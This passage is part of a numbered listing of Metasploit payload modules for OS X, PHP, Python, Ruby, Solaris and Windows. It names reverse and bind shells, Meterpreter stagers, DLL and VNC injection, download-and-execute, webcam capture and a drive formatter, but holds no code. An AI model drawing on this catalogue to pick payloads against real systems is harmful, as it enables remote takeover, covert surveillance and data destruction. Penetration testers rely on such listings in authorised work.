254 osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline + 255 osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager + 256 osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager + 257 osx/x64/exec normal No OS X x64 Execute Command + 258 osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager + 259 osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager + 260 osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline + 261 osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline + 262 osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline + 263 osx/x64/say normal No OS X x64 say Shellcode + 264 osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP + 265 osx/x64/shell_find_tag normal No OSX Command Shell, Find Tag Inline + 266 osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP + 267 osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager + 268 osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager + 269 osx/x86/exec normal No OS X Execute Command + 270 osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager + 271 osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager + 272 osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline + 273 osx/x86/shell_find_port normal No OS X Command Shell, Find Port Inline + 274 osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline + 275 osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager + 276 osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager + 277 osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline + 278 osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline + 279 php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) + 280 php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6 + 281 php/bind_php normal No PHP Command Shell, Bind TCP (via PHP) + 282 php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6 + 283 php/download_exec normal No PHP Executable Download and Execute + 284 php/exec normal No PHP Execute Command + 285 php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager + 286 php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6 + 287 php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support + 288 php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support + 289 php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager + 290 php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager + 291 php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline + 292 php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl) + 293 php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP) + 294 php/shell_findsock normal No PHP Command Shell, Find Sock + 295 python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager + 296 python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support + 297 python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager + 298 python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager + 299 python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager + 300 python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager + 301 python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support + 302 python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline + 303 python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline + 304 python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline + 305 python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline + 306 python/shell_bind_tcp normal No Command Shell, Bind TCP (via python) + 307 python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python) + 308 python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python) + 309 python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python) + 310 r/shell_bind_tcp normal No R Command Shell, Bind TCP + 311 r/shell_reverse_tcp normal No R Command Shell, Reverse TCP + 312 ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP + 313 ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6 + 314 ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP + 315 ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL + 316 solaris/sparc/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline + 317 solaris/sparc/shell_find_port normal No Solaris Command Shell, Find Port Inline + 318 solaris/sparc/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline + 319 solaris/x86/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline + 320 solaris/x86/shell_find_port normal No Solaris Command Shell, Find Port Inline + 321 solaris/x86/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline + 322 tty/unix/interact normal No Unix TTY, Interact with Established Connection + 323 windows/adduser normal No Windows Execute net user /ADD + 324 windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager + 325 windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager + 326 windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) + 327 windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 328 windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager + 329 windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7) + 330 windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86) + 331 windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 332 windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) + 333 windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager + 334 windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager + 335 windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) + 336 windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy + 337 windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6) + 338 windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) + 339 windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) + 340 windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager + 341 windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager + 342 windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS) + 343 windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 344 windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 345 windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support + 346 windows/dllinject/reverse_udp normal No Reflective DLL Injection, Reverse UDP Stager with UUID Support + 347 windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) + 348 windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution + 349 windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute + 350 windows/exec normal No Windows Execute Command + 351 windows/format_all_drives manual No Windows Drive Formatter + 352 windows/loadlibrary normal No Windows LoadLibrary Path + 353 windows/messagebox normal No Windows MessageBox + 354 windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager + 355 windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager + 356 windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) + 357 windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + 358 windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager + 359 windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) + 360 windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) + 361 windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + 362 windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) + 363 windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager + 364 windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager + 365 windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) + 366 windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy + 367 windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) + 368 windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy + 369 windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) + 370 windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager + 371 windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) + 372 windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) + 373 windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager + 374 windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager + 375 windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) + 376 windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 377 windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 378 windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support + 379 windows/meterpreter/reverse_udp normal No Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support + 380 windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) + 381 windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) + 382 windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline + 383 windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline + 384 windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline + 385 windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline + 386 windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) + 387 windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline + 388 windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP + 389 windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline + 390 windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager + 391 windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager + 392 windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) + 393 windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 394 windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager + 395 windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7) + 396 windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86) + 397 windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 398 windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) + 399 windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager + 400 windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6) + 401 windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7) + 402 windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) + 403 windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager + 404 windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager + 405 windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS) + 406 windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 407 windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 408 windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support + 409 windows/patchupdllinject/reverse_udp normal No Windows Inject DLL, Reverse UDP Stager with UUID Support + 410 windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager + 411 windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager + 412 windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) + 413 windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + 414 windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager + 415 windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) + 416 windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) + 417 windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + 418 windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) + 419 windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager + 420 windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) + 421 windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) + 422 windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) + 423 windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager + 424 windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager + 425 windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) + 426 windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 427 windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 428 windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support + 429 windows/patchupmeterpreter/reverse_udp normal No Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support + 430 windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + 431 windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + 432 windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager + 433 windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager + 434 windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) + 435 windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 436 windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager + 437 windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7) + 438 windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86) + 439 windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 440 windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) + 441 windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager + 442 windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6) + 443 windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7) + 444 windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) + 445 windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager + 446 windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager + 447 windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS) + 448 windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 449 windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 450 windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support + 451 windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support + 452 windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline + 453 windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline + 454 windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline + 455 windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline + 456 windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!" + 457 windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager + 458 windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager + 459 windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) + 460 windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 461 windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager + 462 windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7) + 463 windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86) + 464 windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 465 windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) + 466 windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager + 467 windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6) + 468 windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) + 469 windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) + 470 windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager + 471 windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager + 472 windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS) + 473 windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 474 windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 475 windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support + 476 windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support + 477 windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager + 478 windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager + 479 windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) + 480 windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + 481 windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager + 482 windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) + 483 windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) + 484 windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + 485 windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) + 486 windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager + 487 windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager + 488 windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) + 489 windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy + 490 windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) + 491 windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) + 492 windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) + 493 windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager + 494 windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager + 495 windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS) + 496 windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 497 windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 498 windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support + 499 windows/vncinject/reverse_udp normal No VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support + 500 windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) + 501 windows/x64/exec normal No Windows x64 Execute Command + 502 windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path + 503 windows/x64/messagebox normal No Windows MessageBox x64 + 504 windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager + 505 windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support + 506 windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager + 507 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager + 508 windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) + 509 windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) + 510 windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) + 511 windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager + 512 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager + 513 windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 514 windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) + 515 windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) + 516 windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) + 517 windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) + 518 windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64) + 519 windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64) + 520 windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) + 521 windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) + 522 windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64 + 523 windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + 524 windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + 525 windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager + 526 windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support + 527 windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager + 528 windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager + 529 windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) + 530 windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager + 531 windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 532 windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) + 533 windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline + 534 windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline + 535 windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager + 536 windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support + 537 windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager + 